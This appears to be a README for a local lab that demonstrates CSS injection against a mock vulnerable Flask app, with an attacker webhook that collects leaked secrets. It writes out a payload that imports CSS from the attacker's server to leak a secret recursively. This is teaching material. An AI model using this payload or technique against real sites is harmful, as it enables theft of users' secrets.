CSS Injection.
Click==7.0
Flask==1.1.1
itsdangerous==1.1.0
Jinja2==2.10.3
MarkupSafe==1.1.1
pyperclip==1.7.0
Werkzeug==0.16.0
pip install -r requirements.txt
An example of a classical CSS Injection attack. The attacker needs to have the user POST the attack vector every time.
- Run
attacker/server.py
anduser/server.py
. - Run
attacker/exploit.py
. - Post the attack vector generated by
attacker/exploit.py
to0.0.0.0:8080
, the leaked secret will be displayed on the console ofattacker/server.py
. - Enter the leaked secret into
attacker/exploit.py
and continue the attack. - Loop...
user/server.py
: Mock web application that has CSS Injection vulnerability.attacker/exploit.py
: Generates a CSS Injection attack vector and copies it to the clipboard.attacker/server.py
: Webhook to collect secret.
An example of CSS Injection using Recursive Import technique.
- Run
attacker/server.py
anduser/server.py
. - Post the attack vector:
<style>@import url('http://0.0.0.0:8081/css/0.css')</style>
. - Leakage continues recursively due to CSS import
user/server.py
: Mock web application that has CSS Injection vulnerability.attacker/server.py
: Webhook to collect secret.attacker/templates/tmpl.jinja2
: Attack vector(CSS) template.